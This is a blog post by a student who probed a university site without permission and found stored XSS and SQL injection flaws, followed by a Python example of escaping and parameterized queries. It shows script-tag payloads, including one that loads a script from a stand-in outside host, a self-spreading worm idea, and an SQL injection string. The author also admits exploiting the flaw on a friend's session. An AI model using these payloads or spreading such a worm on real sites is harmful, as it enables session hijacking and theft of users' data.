How I hacked a site

I did no harm, so don’t start booing me before you read the whole story. I just went far enough to prove that there was in fact an exploitable security issue, and I must admit I also showed off to one of my friends by greeting him by name once he logged into the site. I also reported the vulnerabilities to the appropriate people.

How this came about.

Exam time is a weird time for students: they start getting a taste of the holidays while still performing under the academic pressure of having to pass.

In the middle of my exams I was having problems sleeping because of the stress. During one of these periods of stress-induced insomnia I decided I would rather be doing something than just lying in bed, so I grabbed my netbook and started to surf the net. At some stage I ended up on the computer science site to check whether there was any news related to my course. So there I was at 2:30 AM, browsing around the site, when I had this crazy idea: is this site secure? I don’t know why I had that thought, but there it was, and since I wasn’t sleeping anyway I decided to give the site a test.

First I had a crack at the user login form, but that was hardened against my primitive attacks. Was that true for the whole site, though, or was there some area that the students before me had not yet checked? I tried a few of the other forms on the site for SQL injection vulnerabilities and found none, which is to be expected. What I did find was an XSS vulnerability in the member details form: I could put a script tag into my surname and it was not escaped when rendered. You might say that is not a big deal. It seems so innocent to add
<script>alert("Hello World");</script>
to my surname. But I could also change that to
<script src="https://example.com/evilScript.js"></script>

Which does not look half as cute, does it? After some brainstorming I thought of a way to infect other users: update their details in the background to include my script in their surname. The infection happens whenever my surname is rendered by the browser. This, boys and girls, is a worm similar to the MySpace worm. So it has gone viral, now what?

No, it cannot start the zombie apocalypse (I think... I hope). But it could do all of the following:
  • Session Hijacking
  • Steal passwords 
  • Download other students code for assignments 
  • Steal other students’ and lecturers’ email addresses and other hidden personal information.
  • Post content as a lecturer or student.
Pretty scary stuff for such an innocent vulnerability!
I also found a SQL injection vulnerability, but to me that is not very special because it is so common, yet so easy to prevent that I am just astounded it exists.
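Both fixes the post calls easy, side by side, as an added example that is not code from the post or from the site in question: the surname rendered raw (the stored XSS above) next to the same value HTML-escaped at output time, and the details update done with a bound parameter instead of string splicing. The table, member row and payload strings are constructed for the demo.

```python
import html
import sqlite3

# Constructed payloads, the same shape as the ones discussed in the post.
XSS_SURNAME = '<script>alert("Hello World");</script>'
SQLI_SURNAME = "x'); DELETE FROM members; --"


def open_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's member table (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, first TEXT, surname TEXT)")
    conn.execute("INSERT INTO members (first, surname) VALUES ('Ada', 'Lovelace')")
    conn.commit()
    return conn


def update_surname(conn: sqlite3.Connection, member_id: int, surname: str) -> None:
    """Hardened update: the value is bound as a parameter, never spliced into SQL text,
    so a surname like SQLI_SURNAME is stored as a literal string."""
    conn.execute("UPDATE members SET surname = ? WHERE id = ?", (surname, member_id))
    conn.commit()


def render_member_vulnerable(first: str, surname: str) -> str:
    """The bug from the post: the surname is interpolated raw, so a <script> tag runs."""
    return f"<p>Welcome, {first} {surname}</p>"


def render_member(first: str, surname: str) -> str:
    """Hardened rendering: HTML-encode every user-controlled value at output time."""
    return f"<p>Welcome, {html.escape(first)} {html.escape(surname)}</p>"


def demo() -> dict:
    """Store both payloads and show what each rendering path emits."""
    conn = open_db()
    update_surname(conn, 1, XSS_SURNAME)
    first, surname = conn.execute("SELECT first, surname FROM members WHERE id = 1").fetchone()
    vulnerable = render_member_vulnerable(first, surname)  # executes in a browser
    hardened = render_member(first, surname)               # shows the text, runs nothing
    update_surname(conn, 1, SQLI_SURNAME)
    stored = conn.execute("SELECT surname FROM members WHERE id = 1").fetchone()[0]
    rows = conn.execute("SELECT COUNT(*) FROM members").fetchone()[0]
    return {"vulnerable": vulnerable, "hardened": hardened, "stored_sqli": stored, "rows": rows}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```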

Moral of the story

So yeah, that is how I hacked a site. I am posting about the experience both as a warning to other developers and as a warning to myself.
  • Innocent looking vulnerabilities can have very grave consequences.
  • Your security is only as strong as your weakest point.
If this post makes just 1 site more secure I will be very happy. So go code, but be safe.
